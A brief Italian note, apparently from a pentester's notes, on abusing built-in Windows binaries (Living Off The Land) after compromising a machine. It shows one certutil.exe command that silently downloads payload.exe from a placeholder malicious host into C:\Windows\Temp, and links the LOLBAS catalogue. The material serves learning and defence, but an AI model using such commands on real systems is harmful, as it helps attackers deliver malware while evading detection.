tags: Abuso_Script_Windows Malware_Fileless
Una volta exploitata una macchina Windows è possibile abusare di molti script già presenti all’interno di Windows per effettuare operazioni malevole senza il bisogno di importare altri strumenti, questi strumenti di chiamano Living Off The Land Binaries e sono script molto difficili da rilevare dai sistemi di difesa proprio perchè sono strumenti legittimi di Windows, per esempio possiamo utilizzare lo strumento certutil.exe per trasferire file in modo silenzioso:
certutil.exe -urlcache -split -f http://indirizzo_malevolo/payload.exe C:\Windows\Temp\payload.exeA questo sito https://lolbas-project.github.io/ è possibile trovare un sacco di questi script con una breve descrizione e funzionamento di ognuno.